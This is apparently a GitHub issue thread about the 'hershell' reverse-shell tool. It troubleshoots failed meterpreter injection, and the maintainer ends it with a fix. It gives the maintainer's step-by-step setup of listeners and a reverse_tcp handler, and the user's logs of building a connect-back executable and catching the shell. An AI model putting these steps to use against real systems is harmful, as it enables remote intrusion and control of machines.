Comments (7)
Hi @b1tg ,
Thanks for the report, I'll look into it this week.
Please note that this feature is a bit buggy currently, and I am working on a way to improve it.
from hershell.
Ok so I see what's going on here, and you might have misunderstood something along the way.
You need two payload handlers:
- one for hershell to connect back
- one for your meterpreter payload to connect back
The one I gave as an example in the README is the one needed for hershell.
You need to start another one for your meterpreter session. Currently, I'm only supporting the following payloads for the meterpreter staging:
windows/meterpreter/reverse_tcp
: the X86 reverse TCP meterpreter for Windowswindows/x64/meterpreter/reverse_tcp
: the X86_64 TCP merterpreter for Windows
I've implemented the reverse_http
and reverse_https
, but it needs more testing before being pushed on master.
So, to sum it up, what you need is:
- Start a listener for hershell (ncat, openssl, msfconsole, etc.)
- Get your hershell session
- Start a payload handler (using
exploit/multi/handler
) for the following payload :windows/x64/meterpreter/reverse_tcp
- Run
meterpreter KALI_IP:PORT
in hershell - Hopefully, enjoy your new injected meterpreter
The current README might be confusing, so I think I will add some examples, and clean it a bit so there will be no more confusions in the future.
Let me now if it still does not work after trying this.
And anyway, thanks for your interest on this project.
from hershell.
i tried this again, still can't work, hershell exited after run "meterpreter ip:port" , and meterpreter session didn't created
msf exploit(handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
2 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.123.47:1235
msf exploit(handler) >
[*] Sending stage (205379 bytes) to 192.168.123.47
[*] - Meterpreter session 4 closed. Reason: Died
[*] Meterpreter session 4 opened (127.0.0.1 -> 127.0.0.1) at 2018-01-22 13:33:04 +0800
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) >
ss@kali:~/Desktop/tools/hershell$ make windows64 LHOST=192.168.123.47 LPORT=1234
GOOS=windows GOARCH=amd64 go build --ldflags "-X main.connectString=192.168.123.47:1234 -X main.fingerPrint=$(openssl x509 -fingerprint -sha256 -noout
-in server.pem | cut -d '=' -f2) -H=windowsgui" -o hershell.exe hershell.go
ss@kali:~/Desktop/tools/hershell$ ls
hershell.exe hershell.go Makefile README.md server.key server.pem shell
ss@kali:~/Desktop/tools/hershell$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsxNQxfJJJdMvrhFAhJTvJLwpKgmKPoJCgX+fdym91b4E
MKdz81UgLJ0ThllSWD3rG/hJfPsXCB1etszAKPpzjPnXUFYhJTc97PiFOGk5vJjj
KaEGAgRaZXc7ogQCAhwgpAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: X25519:P-256:P-384:P-521
Shared Elliptic curves: X25519:P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
[hershell]> meterpreter 192.168.123.47:1235
[hershell]> ERROR
shutting down SSL
CONNECTION CLOSED
ACCEPT
from hershell.
Thanks for the update, I'll look into it.
As I said earlier, this feature is still a bit buggy, and needs improvements.
I'll leave this issue open until the meterpreter injection works reliably.
I had some similar issues with Windows Server 2008 R2 recently: I had to retry several times to get the reverse TCP payload to work, whereas it worked like a charm on Windows 10 machine.
Anyway, I'll look into it.
from hershell.
The issue should be fixed in 3ceef30
, pushed in master.
There was indeed a problem while fetching the stage2 from the metasploit TCP handler.
Could you please get the latest version and test again ?
I have no problem on Windows 10 x64 with this update.
from hershell.
i just test again, problem fixed in the latest version,
nicely done! @lesnuages
from hershell.
Great, let's close this one :)
from hershell.
Related Issues (9)
- The compiled binary does not send request to server HOT 3
- Enhance the README
- how to generate exe file? HOT 6
- Can't catch shell HOT 10
- Feature Request: Proxy Support HOT 1
- Meterpreter staging SSL error HOT 4
- Automaticly spawn meterpreter shell without interaction HOT 2
- 'GOOS' is not recognized as an internal or external command HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from hershell.